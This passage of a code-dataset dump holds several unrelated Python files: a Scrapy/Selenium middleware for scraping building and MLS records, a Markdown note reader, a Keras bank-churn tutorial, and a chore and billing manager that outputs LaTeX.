If a method is not defined,\n # scrapy acts as if the spider middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_spider_input(self, response, spider):\n # Called for each response that goes through the spider\n # middleware and into the spider.\n\n # Should return None or raise an exception.\n return None\n\n def process_spider_output(self, response, result, spider):\n # Called with the results returned from the Spider, after\n # it has processed the response.\n\n # Must return an iterable of Request, dict or Item objects.\n for i in result:\n yield i\n\n def process_spider_exception(self, response, exception, spider):\n # Called when a spider or process_spider_input() method\n # (from other spider middleware) raises an exception.\n\n # Should return either None or an iterable of Response, dict\n # or Item objects.\n pass\n\n def process_start_requests(self, start_requests, spider):\n # Called with the start requests of the spider, and works\n # similarly to the process_spider_output() method, except\n # that it doesn’t have a response associated.\n\n # Must return only requests (not items).\n for r in start_requests:\n yield r\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass DataDownloaderMiddleware(object):\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the downloader middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_request(self, request, spider):\n # Called for each request that goes through the downloader\n # middleware.\n # Must either:\n # - return None: continue processing this request\n # - or return a Response object\n # - or return a Request object\n # - or raise IgnoreRequest: process_exception() methods of\n # installed downloader middleware will be called\n # begin list of seleniumed URLs\n global where_i_am_now\n global searched_same\n home_url = 'https://webapps1.chicago.gov/buildingrecords'\n login_url = 'https://connectmls-api.mredllc.com/oid/login'\n mls_url = 'https://connectmls'\n search_url = 'https://connectmls3.mredllc.com/mls.jsp?module=search'\n # end list of seleniumed URLs\n if request.url.startswith(home_url):\n address = request.cb_kwargs['full_address']\n browser.get('https://webapps1.chicago.gov/buildingrecords/home')\n radio1 = browser.find_element_by_xpath(\"//input[@id='rbnAgreement1']\")\n radio1.click()\n submit_button = browser.find_element_by_xpath(\"//button[@id='submit']\")\n submit_button.click()\n assert \"Building Permit and Inspection Records\" in browser.title\n text_box = browser.find_element_by_id('fullAddress')\n text_box.send_keys(address + Keys.RETURN)\n sleep(2)\n where_i_am_now = browser.current_url\n body = browser.page_source\n # minify html\n body = body.replace('\\t', '')\n body = body.replace('\\n', '')\n body = re.sub('>\\s*<', '><',body, 0, re.M)\n # minify html\n return HtmlResponse(where_i_am_now, body=body, encoding='utf-8', request=request)\n elif request.url.startswith(mls_url):\n if not loggedin:\n log_in_browser(login_url)\n if request.url.endswith('module=search'):\n if not searched_same:\n 
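# --- Worked example of the 'minify html' regex used in this handler -----------
# re.sub('>\s*<', '><', body) collapses whitespace between tags only; text
# inside an element is left untouched:
import re

sample = '<ul>\n  <li> a </li>\n</ul>'
assert re.sub(r'>\s*<', '><', sample) == '<ul><li> a </li></ul>'
# ------------------------------------------------------------------------------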
browser.get(request.url)\n sleep(2)\n drop_down = Select(browser.find_element_by_id('search_type'))\n drop_down.select_by_value('MEMBER')\n sleep(2)\n browser.get(request.url)\n where_i_am_now = browser.current_url\n body = browser.page_source\n # minify html\n body = body.replace('\\t', '')\n body = body.replace('\\n', '')\n body = re.sub('>\\s*<', '><', body, 0, re.M)\n # / minify html\n return HtmlResponse(where_i_am_now, body=body, encoding='utf-8', request=request)\n else:\n return None\n\n def process_response(self, request, response, spider):\n # Called with the response returned from the downloader.\n\n # Must either;\n # - return a Response object\n # - return a Request object\n # - or raise IgnoreRequest\n return response\n\n def process_exception(self, request, exception, spider):\n # Called when a download handler or a process_request()\n # (from other downloader middleware) raises an exception.\n\n # Must either:\n # - return None: continue processing this exception\n # - return a Response object: stops process_exception() chain\n # - return a Request object: stops process_exception() chain\n pass\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n","sub_path":"data/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":6995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"500867881","text":"from pathlib import Path\nimport os\nimport pypandoc\nimport settings\n\n\nclass MdFile:\n\n def __init__(self):\n pass\n\n async def my_folder(self):\n \"\"\"\n\n :return: return the folder name used by he filesystem where md files are\n \"\"\"\n return os.path.basename(os.path.normpath(settings.FOLDER))\n\n async def data(self):\n \"\"\"\n\n :return: list of notes\n \"\"\"\n data = []\n p = Path(settings.FOLDER).glob('**/*.md')\n for full_file in p:\n file = os.path.basename(str(full_file))\n with open(str(full_file)) as md_file:\n content = md_file.read()\n\n content = pypandoc.convert_text(source=content,\n to='html',\n format=settings.PYPANDOC_MARKDOWN)\n data.append({'title': file, 'body': content})\n return data\n","sub_path":"baeuda/datasource/mdfile.py","file_name":"mdfile.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"445231606","text":"################################################################################\n# Artificial Neural Network #\n# Would a customer leave the bank? #\n# Featuring: #\n# * 70/30 split evaluation schema #\n# * 2 hidden layers #\n# * BatchNormalization #\n# NOTE: #\n# At the end of this script, you can find how to: #\n# (1) Predict new observation in a way that follows the learning schema (DPP). #\n# (2) Find the best threshold for mapping probabilities into binary outcome. 
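# --- Minimal usage sketch (hedged; assumes the pandoc binary is installed) ----
# pypandoc.convert_text drives pandoc directly, which is what MdFile.data()
# above relies on for its Markdown -> HTML step:
import pypandoc

html = pypandoc.convert_text('# Title\n\nSome *emphasis*.', to='html',
                             format='md')
print(html)   # e.g. '<h1 id="title">Title</h1>\n<p>Some <em>emphasis</em>.</p>'
# ------------------------------------------------------------------------------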
#\n################################################################################\n'''\nMake sure python supports tensorflow by installing python version 3.5.3.\nRead the \"py53\" text file\n'''\nimport os\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers.normalization import BatchNormalization\nfrom tensorflow.contrib.keras import backend\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # filter out WARNING logs\n\n################\n# Get the Data #\n################\n# Importing the dataset\ndataset = pd.read_csv(os.path.join('data', 'Churn_Modelling.csv')) # , index_col='RowNumber')\n# Keep only useful columns\ndataset.drop(['RowNumber', 'CustomerId', 'Surname'], axis=1, inplace=True)\nX = dataset.drop(['Exited'], axis=1).values # returns numpy.ndarry\ny = dataset.loc[:, 'Exited'].values\n\n######################\n# Data Preprocessing #\n######################\n# 1. Encoding the Independent (categorical) Variables\n# Convert labels [Germany, France, Spain] into levels [1, 2, 3]\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n# 2. Convert levels [1, 2, 3] into one-hot representation [001, 010, 100]\nonehotencoder = OneHotEncoder(categorical_features=[1])\nX = onehotencoder.fit_transform(X).toarray()\n# 3. Remove a single one-hot variable to avoid the dummy variable trap\nX = X[:, 1:] # remove column 0\n\n#####################\n# Split the Dataset #\n#####################\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1633)\n\n###################\n# Feature Scaling #\n###################\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n########################################\n# ANN with Stochastic Gradient Descent #\n########################################\n'''\nSTEP 1: Randomly initialise the weights to small numbers close to 0 (but not 0).\nSTEP 2: Input the first observation of your data set in the input layer, each \n feature in one input node.\nSTEP 3: Forward-Propagation: from left to right, the neurons are activated in a\n way that the impact of each neuron's activation is limited by the \n weights. Propagate the activations until getting the predicted result y. \nSTEP 4: Compare the predicted result to the actual result. Measure the generated\n error.\nSTEP 5: Back-Propagation: from right to left, the error is back propagated. \n Update the weights in accordance with how much they are responsible for\n the error. The learning rate decides by how much we update the weights.\nSTEP 6: Repeat steps 2 to 5 and update the weights after each observation\n (Reinforcement Learning). Or: Repeat steps 2 to 5 but update the weights\n only after a batch of observations (Batch Learning).\nSTEP 7: When the whole training set passed through the ANN, that makes an epoch.\n Redo more epochs.\n'''\n\n'''\n###############################\n# The million dollar question #\n###############################\nHow many nodes should be in the hidden layer we are adding?\nWho knows? 
For this date, there are no explicit guidelines, instead it's \nconsidered as an art.\nIf you don't want to perform art then, define:\nn_in - number of nodes in the input layer\nn_out - number of nodes in the output layer\nthen set the number of nodes in the first hidden layer n_1, to be\nn_1 = (n_in + n_out) / 2\n'''\n\n########################\n# Initializing the ANN #\n########################\nclassifier = Sequential(layers=None) # the design of the layers would be manual\n# Add the input layer and the first hidden layer\nclassifier.add(Dense(units=6, # dimensionality of the output space\n kernel_initializer='uniform', # STEP 1\n activation='relu', # Rectifier function\n input_dim=11) # because we have 11 independent variables\n )\nclassifier.add(BatchNormalization())\n# Add a second hidden layer\nclassifier.add(Dense(units=6, # dimensionality of the output space\n kernel_initializer='uniform', # STEP 1\n activation='relu') # Rectifier function\n )\nclassifier.add(BatchNormalization())\n# Add the output layer\nclassifier.add(Dense(units=1, # dimensionality of the output space\n kernel_initializer='uniform', # STEP 1\n activation='sigmoid') # Sigmoid function, in case of multi-label classification use 'softmax'\n )\n# Compiling the ANN\nclassifier.compile(\n # optimizer; stochastic gradient descent \n optimizer='adam',\n # loss; use 'categorical_crossentropy' for multi-label classification \n loss='binary_crossentropy',\n # metrics; \n metrics=['accuracy']\n)\n\n#################\n# Train the ANN #\n#################\ntime_0 = datetime.datetime.now()\nclassifier.fit(x=X_train, y=y_train,\n batch_size=10, # STEP 6\n epochs=100 # STEP 7\n )\ntime_taken = datetime.datetime.now() - time_0\n\n######################\n# Evaluate the Model #\n######################\n# Choose the liability threshold\nthresholds = np.append(np.arange(0, 1, step=0.01), 1)\naccuracies = np.array([])\nfor threshold in thresholds:\n # Predict the Train set result\n y_pred = classifier.predict(X_train)\n # Apply the liability threshold\n y_lib = (y_pred > threshold)\n # Calculate Accuracy\n accuracies = np.append(accuracies, accuracy_score(y_train, y_lib))\nthreshold = thresholds[np.argmax(accuracies)]\n# Predict the Test set result\ny_pred = classifier.predict(X_test)\ny_lib = (y_pred > threshold)\n# Make the confusion matrix\ncm = confusion_matrix(y_test, y_lib)\n# Calculate Accuracy on the Test set\naccuracy = accuracy_score(y_test, y_lib)\n\n##############\n# Deployment #\n##############\n'''\nPredict if the customer with the following information will leave the bank:\nCredit Score: 600\nGeography: France\nGender: Male\nAge: 40\nTenure: 3\nBalance: 60000\nNumber of Products: 2\nHas Credit Card: Yes\nIs Active Member: Yes\nEstimated Salary: 50000\n'''\n# Get the customer details\nnew_customer = np.array([[600, 'France', 'Male', 40, 3, 6e5, 2, 1, 0, 5e6]], dtype='object')\n# Preprocesss the data\nnew_customer[:, 1] = labelencoder_X_1.transform(new_customer[:, 1])\nnew_customer[:, 2] = labelencoder_X_2.transform(new_customer[:, 2])\nnew_customer = onehotencoder.transform(new_customer).toarray()\nnew_customer = new_customer[:, 1:]\n# Scale the customer\nnew_customer = sc.fit_transform(new_customer)\n# Deploy the model on a new customer\nnew_prediction = classifier.predict(new_customer)\ny_hat = (new_prediction > 0.5)\nprint(\"Should we say goodbye to that customer?\", *y_hat)\n\n#############################\n# Remove model form CPU/GPU #\n#############################\nbackend.clear_session()\n\n#################\n# 
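# --- Editorial note (likely bug in the deployment block above, hedged) --------
# sc.fit_transform(new_customer) re-estimates the scaler from the single new
# row, so every feature is standardised against itself instead of against the
# training distribution. The scaler fitted on X_train should be reused:
# new_customer = sc.transform(new_customer)
# ------------------------------------------------------------------------------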
Print Results #\n#################\nprint('\\n###########################################################')\nprint('# Threshold value: ' + str(threshold)) # Threshold: 0.54, 0.47, 0.52, 0.51\nprint('# Test set accuracy: ' + str(accuracy)) # Accuracy: 0.86, 0.84, 0.84, 0.87\nprint('# Time: ' + str(time_taken)) # Time: 0:00:55\nprint('###########################################################\\n')\n","sub_path":"topic_1_ANN/banking_churn_basic_7030.py","file_name":"banking_churn_basic_7030.py","file_ext":"py","file_size_in_byte":8556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"220618234","text":"# -*- coding: utf8 -*-\nimport json\nimport datetime\nimport uuid\nimport copy\nimport re\nimport random\n\ndef tex_escape(text):\n '''\n :param text: a plain text message\n :return: the message escaped to appear correctly in LaTeX\n '''\n conv = {\n '&': r'\\&',\n '%': r'\\%',\n '$': r'\\$',\n '#': r'\\#',\n '_': r'\\_',\n '{': r'\\{',\n '}': r'\\}',\n '~': r'\\textasciitilde{}',\n '^': r'\\^{}',\n '\\\\': r'\\textbackslash{}',\n '<': r'\\textless',\n '>': r'\\textgreater',\n }\n regex = re.compile('|'.join(re.escape(str(key)) for key in sorted(conv.keys(), key = lambda item: - len(item))))\n return regex.sub(lambda match: conv[match.group()], text)\n\nclass DataHandler:\n def __init__(self):\n self.ConfigFile = 'config/config.json'\n self.AssignmentsFile = 'config/assignments.json'\n self.BillingFile = 'config/billing.json'\n self.DataTexFile = 'tex/data.tex'\n self.DateTexFile = 'tex/date.tex'\n self.BankTexFile = 'tex/bank_details.tex'\n\n self.ConfigData = { 'chores' : {}, 'participants' : {} }\n self.AssignmentsData = {}\n self.BillingData = { 'config' : {'recurring' : 0.0, 'bank_name' : '', 'acc_no' : '', 'acc_holder' : '', 'loc' : ''}, 'bills' : {}, 'group_bills' : {}, 'expenses' : {}, 'payments' : {} }\n\n self.TempWeekAsignment = {}\n\n self.NotFoundData = {\n 'chores' :\n {'freq': -1, 'priority': -1, 'alast': '0001-W1', 'timestamp': '(not found)', 'name': '(not found)', 'uuid': '(not found)', 'atimes': -1, 'points': 0},\n 'participants' :\n {'uuid': '(not found)', 'timestamp': '(not found)', 'name': '(not found)', 'home': False}\n }\n\n try:\n config_file = open(self.ConfigFile, 'r')\n file_string = config_file.read()\n config_file.close()\n self.ConfigData.update(json.loads(file_string))\n\n except Exception as e:\n print('Error loading configuration file: %s' % e)\n\n self.UpdateConfigFile()\n self.GenerateSortedLists()\n\n try:\n assignments_file = open(self.AssignmentsFile, 'r')\n file_string = assignments_file.read()\n assignments_file.close()\n self.AssignmentsData.update(json.loads(file_string))\n\n except Exception as e:\n print('Error loading assignments file: %s' % e)\n\n self.UpdateAssignmentsFile()\n\n try:\n billing_file = open(self.BillingFile, 'r')\n file_string = billing_file.read()\n billing_file.close()\n self.BillingData.update(json.loads(file_string))\n\n except Exception as e:\n print('Error loading billing file: %s' % e)\n\n self.UpdateBillingFile()\n\n def GenerateSortedLists(self):\n self.SortedParticipantsList = [(pid, self.GetItemKey('participants', pid, 'name')) for pid in self.ConfigData['participants']]\n self.SortedParticipantsList.sort(key=lambda e: e[1].lower())\n self.SortedChoresList = [(pid, self.GetItemKey('chores', pid, 'name')) for pid in self.ConfigData['chores']]\n self.SortedChoresList.sort(key=lambda e: e[1].lower())\n\n def AddNewItem(self, key, new_data):\n 
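# --- Worked example of the tex_escape helper above (hypothetical input) -------
# tex_escape('50% of $10 & a_b')  ->  '50\% of \$10 \& a\_b'
# Sorting the keys by descending length before building the alternation keeps
# multi-character sequences from being escaped piecewise.
# ------------------------------------------------------------------------------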
new_data.update({'timestamp': str(datetime.datetime.now()), 'uuid': str(uuid.uuid4())})\n self.ConfigData[key][new_data['uuid']] = new_data\n self.GenerateSortedLists()\n self.UpdateConfigFile()\n return new_data['uuid']\n\n def EditItem(self, key, uuid, new_data):\n try:\n self.ConfigData[key][uuid].update(new_data)\n self.GenerateSortedLists()\n self.UpdateConfigFile()\n except:\n return\n\n def RemoveItem(self, key, uuid):\n del self.ConfigData[key][uuid]\n self.GenerateSortedLists()\n self.UpdateConfigFile()\n\n def GetItem(self, key, uuid):\n try:\n return self.ConfigData[key][uuid]\n except Exception as e:\n return self.NotFoundData[key]\n\n def GetItemKey(self, key, uuid, itemkey):\n try:\n return self.ConfigData[key][uuid][itemkey]\n except Exception as e:\n return self.NotFoundData[key][itemkey]\n\n def BillingAddNewItem(self, key, new_data):\n new_data.update({'timestamp': str(datetime.datetime.now()), 'tuuid': str(uuid.uuid4())})\n self.BillingData[key][new_data['tuuid']] = new_data\n self.UpdateBillingFile()\n return new_data['tuuid']\n\n def BillingEditItem(self, key, uuid, new_data):\n self.BillingData[key][uuid].update(new_data)\n self.UpdateBillingFile()\n\n def BillingRemoveItem(self, key, uuid):\n del self.BillingData[key][uuid]\n self.UpdateBillingFile()\n\n def BillingGetItemsInRange(self, key, date0 = None, date1 = None):\n if date0 and date1:\n return [tuuid for tuuid in self.BillingData[key] if date0 <= datetime.date(*self.BillingData[key][tuuid]['date']) <= date1]\n\n elif date0 and date1 == None:\n return [tuuid for tuuid in self.BillingData[key] if date0 <= datetime.date(*self.BillingData[key][tuuid]['date'])]\n\n elif date0 == None and date1:\n return [tuuid for tuuid in self.BillingData[key] if datetime.date(*self.BillingData[key][tuuid]['date']) <= date1]\n\n else:\n return list(self.BillingData[key].keys())\n\n def ComputeDateFromWeek(self, str_date, day = 1):\n return datetime.datetime.strptime('%s-%d' % (str_date, day), '%Y-W%W-%w').date()\n\n def BillingGetChoresInRange(self, date0, date1):\n # chores_data[puuid] = reward\n chores_data = {}\n for (pid, name) in self.SortedParticipantsList:\n chores_data[pid] = 0.0\n\n for key in self.AssignmentsData:\n if date0 <= self.ComputeDateFromWeek(key) <= date1:\n for auuid in self.AssignmentsData[key]['normal']:\n reward = self.GetItemKey('chores', self.AssignmentsData[key]['normal'][auuid]['choreuuid'], 'reward')\n\n chores_data[self.AssignmentsData[key]['normal'][auuid]['personuuid']] += reward * ( 1.0 if self.AssignmentsData[key]['normal'][auuid]['home'] else 0.0 )\n\n for pid in self.AssignmentsData[key]['normal'][auuid]['puuidcomp']:\n chores_data[pid] -= reward\n\n for auuid in self.AssignmentsData[key]['other']:\n reward = self.GetItemKey('chores', self.AssignmentsData[key]['other'][auuid]['choreuuid'], 'reward')\n\n for pid in self.AssignmentsData[key]['other'][auuid]['puuidcomp']:\n chores_data[pid] -= reward\n\n return chores_data\n\n def ComputeCurrentBalance(self, puuid, date = None):\n if date is None:\n bills = sum([self.BillingData['bills'][key]['bill_data']['subtotal'] for key in self.BillingData['bills'] if self.BillingData['bills'][key]['puuid'] == puuid])\n\n payments = sum([self.BillingData['payments'][key]['amount'] for key in self.BillingData['payments'] if self.BillingData['payments'][key]['puuid'] == puuid])\n else:\n bills = sum([self.BillingData['bills'][key]['bill_data']['subtotal'] for key in self.BillingData['bills'] if self.BillingData['bills'][key]['puuid'] == puuid and 
datetime.date(*self.BillingData[key][tuuid]['date']) <= date])\n\n payments = sum([self.BillingData['payments'][key]['amount'] for key in self.BillingData['payments'] if self.BillingData['payments'][key]['puuid'] == puuid and datetime.date(*self.BillingData[key][tuuid]['date']) <= date])\n\n return bills - self.GetItemKey('participants', puuid, 'boffset') - payments\n\n def GetWeekDifference(self, cdate, choreuuid):\n return int((cdate - self.ComputeDateFromWeek(self.GetItemKey('chores', choreuuid, 'alast'))).days / 7)\n\n def TempClearChores(self):\n del self.TempWeekAsignment\n self.TempWeekAsignment = { 'normal' : {}, 'other' : {} }\n\n def TempAddParticipants(self):\n uuids = {}\n for p in self.ConfigData['participants']:\n uuids[p] = self.TempAddChore('normal', '', p)\n return uuids\n\n def TempAddChore(self, key, cid = '', pid = ''):\n if key == 'normal':\n new_data = {'timestamp': str(datetime.datetime.now()), 'uuid': str(uuid.uuid4()), 'personuuid' : pid, 'choreuuid' : cid, 'datecomp' : [], 'puuidcomp' : [], 'home' : True}\n self.TempWeekAsignment['normal'][new_data['uuid']] = new_data\n elif key == 'other' and cid != '':\n uuidvar = self.TempCheckChore(cid, ('other',))\n if uuidvar: return uuidvar\n new_data = {'timestamp': str(datetime.datetime.now()), 'uuid': str(uuid.uuid4()), 'choreuuid' : cid, 'datecomp' : [], 'puuidcomp' : []}\n self.TempWeekAsignment['other'][new_data['uuid']] = new_data\n return new_data['uuid']\n\n def TempRemoveChore(self, key, uuid):\n del self.TempWeekAsignment[key][uuid]\n\n def TempEditChore(self, key, new_data):\n self.TempWeekAsignment[key][new_data['uuid']].update(new_data)\n\n def TempCheckChore(self, uuid, keys = ('normal', 'other')):\n for key in keys:\n for auuid in self.TempWeekAsignment[key]:\n if self.TempWeekAsignment[key][auuid]['choreuuid'] == uuid:\n return auuid\n return ''\n\n def TempRemoveCompleted(self):\n for key in self.TempWeekAsignment['normal']:\n if self.GetItemKey('chores', self.TempWeekAsignment['normal'][key]['choreuuid'], 'freq') > 1:\n self.TempWeekAsignment['normal'][key]['choreuuid'] = ''\n\n def TempAssignNewChores(self, cdate):\n assigned = [self.TempWeekAsignment[key1][key2]['choreuuid'] for key1 in self.TempWeekAsignment for key2 in self.TempWeekAsignment[key1] if self.TempWeekAsignment[key1][key2]['choreuuid'] != '']\n new_chores = [cid for cid in self.ConfigData['chores'] if self.GetWeekDifference(cdate, cid) >= self.GetItemKey('chores', cid, 'freq') and not cid in assigned]\n random.shuffle(new_chores)\n\n nassigned = 0\n for key in self.TempWeekAsignment:\n if len(new_chores) == nassigned: break\n for uuid in self.TempWeekAsignment[key]:\n if len(new_chores) == nassigned: break\n if self.TempWeekAsignment[key][uuid]['choreuuid'] == '':\n self.TempWeekAsignment[key][uuid]['choreuuid'] = new_chores[nassigned]\n nassigned += 1\n\n def SaveAssignment(self, cdate):\n cdatestr = '%d-W%d' % cdate.isocalendar()[:2]\n\n if cdatestr in self.AssignmentsData:\n self.AssignmentsData[cdatestr].update(self.TempWeekAsignment)\n else:\n self.AssignmentsData[cdatestr] = copy.deepcopy(self.TempWeekAsignment)\n\n for key in self.TempWeekAsignment:\n for uuid in self.TempWeekAsignment[key]:\n if self.TempWeekAsignment[key][uuid]['choreuuid'] == '': continue\n #if self.GetWeekDifference(cdate, self.TempWeekAsignment[key][uuid]['choreuuid']) > 0:\n self.EditItem('chores', self.TempWeekAsignment[key][uuid]['choreuuid'], {'alast' : '%d-W%d' % cdate.isocalendar()[:2]})\n\n self.UpdateAssignmentsFile()\n\n def LoadAssignment(self, 
cdate):\n cdatestr = '%d-W%d' % cdate.isocalendar()[:2]\n\n if cdatestr in self.AssignmentsData:\n del self.TempWeekAsignment\n self.TempWeekAsignment = copy.deepcopy(self.AssignmentsData[cdatestr])\n return True\n return False\n\n def LoadAsNewAssignment(self, cdate):\n cdatestr = '%d-W%d' % cdate.isocalendar()[:2]\n\n if cdatestr in self.AssignmentsData:\n self.TempClearChores()\n auuids = self.TempAddParticipants()\n\n for uuid in self.AssignmentsData[cdatestr]['normal']:\n self.TempWeekAsignment['normal'][auuids[self.AssignmentsData[cdatestr]['normal'][uuid]['personuuid']]]['choreuuid'] = self.AssignmentsData[cdatestr]['normal'][uuid]['choreuuid']\n self.TempWeekAsignment['normal'][auuids[self.AssignmentsData[cdatestr]['normal'][uuid]['personuuid']]]['home'] = self.GetItemKey('participants', self.AssignmentsData[cdatestr]['normal'][uuid]['personuuid'], 'athome')\n return True\n\n return False\n\n def TempSaveToTex(self, cdate, adict):\n try:\n tex_file = open(self.DateTexFile, 'w+')\n tex_file.write('Week \\\\textbf{%s} -- From \\\\textbf{%s} to \\\\textbf{%s}' % (cdate.isocalendar()[1], self.ComputeDateFromWeek(datetime.datetime.strftime(cdate, '%Y-W%W'), 1), self.ComputeDateFromWeek(datetime.datetime.strftime(cdate, '%Y-W%W'), 0)))\n tex_file.close()\n\n tex_file = open(self.DataTexFile, 'w+')\n tex_str = []\n\n for i, (uuid, name) in enumerate(self.SortedParticipantsList):\n tex_str.append('%s & %s & %s & \\phantom{---------------} & \\\\\\\\[0.25cm] \\\\hline' % ('Yes' if self.GetItemKey('participants', uuid, 'athome') else 'No', tex_escape(name), tex_escape(self.GetItemKey('chores', self.TempWeekAsignment['normal'][adict[i]['auuid']]['choreuuid'], 'name'))))\n\n for auuid in self.TempWeekAsignment['other']:\n tex_str.append('& (anyone) & %s & \\phantom{---------------} & \\\\\\\\[0.15cm] \\\\hline' % tex_escape(self.GetItemKey('chores', self.TempWeekAsignment['other'][auuid]['choreuuid'], 'name')))\n\n for i in range(max(0, 3-len(self.TempWeekAsignment['other']))):\n tex_str.append('& & & \\phantom{---------------} & \\\\\\\\[0.15cm] \\\\hline')\n\n tex_file.write('\\n'.join(tex_str))\n tex_file.close()\n except Exception as e:\n print('Error writing to data.tex: %s' % e)\n\n def BillingSaveToTex(self, gbuuid):\n try:\n tex_file = open(self.DateTexFile, 'w+')\n date_range = [datetime.date(*d) for d in self.BillingData['group_bills'][gbuuid]['date_range']]\n date_range_str = tuple([datetime.datetime.strftime(datetime.date(*d), '%Y-%m-%d') for d in self.BillingData['group_bills'][gbuuid]['date_range']])\n\n tex_file.write('Period: \\\\textbf{%s} --- \\\\textbf{%s}' % date_range_str)\n tex_file.close()\n\n except Exception as e:\n print('Error writing to %s: %s' % (self.DateTexFile, e))\n\n try:\n tex_file = open(self.DataTexFile, 'w+')\n tex_str = []\n\n sorted_bills = [(buuid, self.GetItemKey('participants', self.BillingData['bills'][buuid]['puuid'], 'name')) for buuid in self.BillingData['group_bills'][gbuuid]['buuids']]\n sorted_bills.sort(key=lambda e: e[1].lower())\n\n for i, (buuid, name) in enumerate(sorted_bills):\n contribution = self.BillingData['bills'][buuid]['bill_data']['contribution']\n psc = self.BillingData['bills'][buuid]['bill_data']['personal_shopping_costs']\n chores = self.BillingData['bills'][buuid]['bill_data']['chores']\n subtotal = self.BillingData['bills'][buuid]['bill_data']['subtotal']\n\n balance = self.ComputeCurrentBalance(self.BillingData['bills'][buuid]['puuid'])\n paid = sum([self.BillingData['payments'][tuuid]['amount'] for tuuid in 
self.BillingGetItemsInRange('payments', date_range[0], datetime.date.today()) if self.BillingData['payments'][tuuid]['puuid'] == self.BillingData['bills'][buuid]['puuid']])\n debt = balance - subtotal + paid\n\n tex_str.append('%s & %.2f & %.2f & %.2f & %.2f & %.2f & %.2f & \\\\emph{%.2f} \\\\\\\\ \\\\hline' % (tex_escape(name), contribution, psc, chores, subtotal, debt, paid, balance))\n\n tex_file.write('\\n'.join(tex_str))\n tex_file.close()\n\n except Exception as e:\n print('Error writing to %s: %s' % (self.DataTexFile, e))\n\n try:\n tex_file = open(self.BankTexFile, 'w+')\n\n rec = self.BillingData['group_bills'][gbuuid]['group_bill_data']['recurring']\n ssc = self.BillingData['group_bills'][gbuuid]['group_bill_data']['shared_shopping_costs']\n\n tex_str = '\\\\EUR{%.2f} & \\\\EUR{%.2f}' % (rec, ssc) + '& %s & %s & %s & %s \\\\\\\\ \\\\hline' % tuple([self.BillingData['config'][key] for key in self.BillingData['config'] if isinstance(self.BillingData['config'][key], str)])\n\n tex_file.write(tex_str)\n tex_file.close()\n\n except Exception as e:\n print('Error writing to %s: %s' % (self.BankTexFile, e))\n\n def UpdateConfigFile(self):\n try:\n config_file = open(self.ConfigFile, 'w+')\n json.dump(self.ConfigData, config_file)\n config_file.close()\n except Exception as e:\n print('Error saving configuration file: %s' % e)\n\n def UpdateAssignmentsFile(self):\n try:\n assignments_file = open(self.AssignmentsFile, 'w+')\n json.dump(self.AssignmentsData, assignments_file)\n assignments_file.close()\n except Exception as e:\n print('Error saving assignments file: %s' % e)\n\n def UpdateBillingFile(self):\n try:\n billing_file = open(self.BillingFile, 'w+')\n json.dump(self.BillingData, billing_file)\n billing_file.close()\n except Exception as e:\n print('Error saving assignments file: %s' % e)\n","sub_path":"datahandler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"427223464","text":"#시뮬레이션 구현문제\n'''\n문제에 주어진 조건을 그대로 구현하는 문제다. 크게 두 단계로 나눠서 설계해야 한다. 첫 번째, 미세먼지가 확산되는 과정, 두 번째 공기청정기의 바람이 순환하는 과정이다.\n\n1. 모든 미세먼지는 5 이상의 양이 남아있으면, 상하좌우로 확산할 수 있다.\n확산할 때 상하좌우에 이미 먼지가 있는 경우가 있으므로, 별도의 배열을 만들어서 확산되는 먼지의 양을 저장해야 한다. 값을 바로 업데이트하면 다음 먼지 확산에 영향을 주기 때문에, 이 과정이 필요하다.\n현재 먼지의 양을 5로 나눈 후, 그 양을 상하좌우 칸에 더한다. 위에서 만든 별도의 배열 B에 더한다.\n모든 과정이 끝나면, 원래 먼지 배열 A에 확산 배열 B 값을 업데이트한다.\n\n2. 미세먼지가 바람 방향에 따라 순환한다.\n입력받을 때 공기청정기의 위치를 S1, S2에 저장한다.\n위쪽 공기청정기는 S1을 기준으로 반시계 방향으로 회전한다.\n아래쪽 공기청정기는 S2를 기준으로 시계 방향으로 회전한다.\n역순으로 회전하면서, 현재 값에 다음 값을 저장하면 된다.\n\n출처: https://rebas.kr/848 [PROJECT REBAS]\n'''\n\n\n#pypy로 통과 ,python3로 통과 못함. 변수명만 바꾸면 python에서도 통과하는데.. 
